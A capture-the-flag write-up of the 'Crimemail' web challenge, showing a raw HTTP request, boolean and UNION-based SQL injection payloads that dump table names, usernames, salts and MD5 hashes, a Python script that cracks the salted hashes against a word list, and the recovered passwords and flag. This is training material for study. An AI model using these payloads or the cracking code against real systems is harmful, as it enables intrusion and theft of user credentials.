Tags: sqli 

Rating:

# ▼▼▼Crimemail - WEB 20 190/549=34.6%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
rvice, to communicate with his associates.
Let's see if you can hack your way in his account...
Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary
```

---

**【Search for vulnerabilities】**

```
POST /hint.php HTTP/1.1
Host: crimemail.ctf.insecurity-insa.fr
Connection: close
Content-Length: 12
Cache-Control: max-age=0
Origin: https://crimemail.ctf.insecurity-insa.fr
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://crimemail.ctf.insecurity-insa.fr/forgot.php
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8
Cookie: scoreboard=e72d247aba1e8bf23b45240642d98732d1505c8e; PHPSESSID=06ig4gvui8hni0urb7p5bo7rg0

username=%27
```

`username='or'1'='1'--+` ⇒ Content-Length: 1331

`username='or'1'='0'--+` ⇒ Content-Length: 953

**The response length changes with the truth value of the injected condition, so a SQL injection vulnerability exists!!**

---

**【Get table name】**

username= `'UNION/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA=database()+--+`

```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(5) "users"
}
}
```

**A `users` table exists!!**

---

**【Get columns name】**

username= `'UNION/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/TABLE_SCHEMA=database()+--+`

```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(6) "userID"
}
[1]=>
array(1) {
["hint"]=>
string(8) "username"
}
[2]=>
array(1) {
["hint"]=>
string(9) "pass_salt"
}
[3]=>
array(1) {
["hint"]=>
string(8) "pass_md5"
}
[4]=>
array(1) {
["hint"]=>
string(4) "hint"
}
}
```

**The column names are `userID`, `username`, `pass_salt`, `pass_md5`, `hint` !!**

---

**【Get the value of username column】**

username= `'UNION/**/select/**/username/**/from/**/users--+`

```
array(5) {
[0]=>
array(1) {
["hint"]=>
string(9) "p.escobar"
}
[1]=>
array(1) {
["hint"]=>
string(7) "g.dupuy"
}
[2]=>
array(1) {
["hint"]=>
string(8) "a.capone"
}
[3]=>
array(1) {
["hint"]=>
string(8) "c.manson"
}
[4]=>
array(1) {
["hint"]=>
string(8) "c.hackle"
}
}
```

---

**【Get every column value for userID=5】**

username= `'UNION/**/select/**/group_concat(userID,":",username,":",pass_salt,":",pass_md5,":",hint)/**/from/**/users/**/where/**/userID=5--+`

```
array(1) {
[0]=>
array(1) {
["hint"]=>
string(76) "5:c.hackle:yhbG:f2b31b3a7a7c41093321d0c98c37f5ad:I don't need any hints man!"
}
}
```

---

The remaining values were obtained in the same way.

`pass_salt`

`Jdhy`, `Kujh`, `hTjl`, `YbEr`, `yhbG`

---

`pass_md5`

`c4598aadc36b55ba1a4f64f16e2b32f1`, `0fd221fc1358c698ae5db16992703bcd`, `23afc9d3a96e5c338f7ba7da4f8d59f8`, `fe3437f0308c444f0b536841131f5274`,
`f2b31b3a7a7c41093321d0c98c37f5ad`

---

**【Identify password】**

`Hint: his password's md5 is computed as followed: md5 = md5($password + $salt) and Collins Hackle has a password which can be found in an english dictionary`

`md5` and `$salt` are known

`$password` is taken from a password list

In a local environment, we **brute-forced with the password list** and identified the passwords

c4598aadc36b55ba1a4f64f16e2b32f1 ⇒ I could not find it

0fd221fc1358c698ae5db16992703bcd ⇒ I could not find it

23afc9d3a96e5c338f7ba7da4f8d59f8 ⇒ `scarface`

fe3437f0308c444f0b536841131f5274 ⇒ `murders`

f2b31b3a7a7c41093321d0c98c37f5ad ⇒ `pizza`
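The offline dictionary check from the step above, as an added Python example that is not part of the original writeup: it recomputes md5($password + $salt) for each candidate word and compares the result with the dumped hash. The salt/hash pairs come from the lists above, paired by position (an assumption for all but the last pair, which the group_concat output confirms); the word list is constructed here and is not a real dictionary. Note how the fast unsalted-per-user MD5 gives no protection once the salt is dumped alongside the hash.

```python
import hashlib
from typing import Iterable, Optional

# Salt/hash pairs as dumped in the writeup, paired by list position (assumption;
# only the last pair is confirmed by the userID=5 row).
DUMPED = [
    ("Jdhy", "c4598aadc36b55ba1a4f64f16e2b32f1"),
    ("Kujh", "0fd221fc1358c698ae5db16992703bcd"),
    ("hTjl", "23afc9d3a96e5c338f7ba7da4f8d59f8"),
    ("YbEr", "fe3437f0308c444f0b536841131f5274"),
    ("yhbG", "f2b31b3a7a7c41093321d0c98c37f5ad"),
]

# Constructed stand-in for an English dictionary (not a real word list).
WORDLIST = ["password", "hello", "scarface", "murders", "pizza", "letmein"]


def salted_md5(password: str, salt: str) -> str:
    """md5($password + $salt) exactly as the challenge hint describes: password first, then salt."""
    return hashlib.md5((password + salt).encode("utf-8")).hexdigest()


def crack(target_hex: str, salt: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the dictionary word whose salted MD5 equals target_hex, or None if no word matches."""
    target = target_hex.strip().lower()
    for word in wordlist:
        if salted_md5(word, salt) == target:
            return word
    return None


def crack_all(entries, wordlist) -> dict:
    """Map each dumped hash to its recovered password (or None). The wordlist is reused per entry."""
    words = list(wordlist)
    return {digest: crack(digest, salt, words) for salt, digest in entries}


if __name__ == "__main__":
    for digest, password in crack_all(DUMPED, WORDLIST).items():
        print(f"{digest} => {password if password else 'I could not find it'}")
```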

---

I logged in with `c.hackle` and `pizza`

```
UNKNOWN SENDER says:
Meet me at INSA{s3cr3t_l0cat10n}
```

`INSA{s3cr3t_l0cat10n}`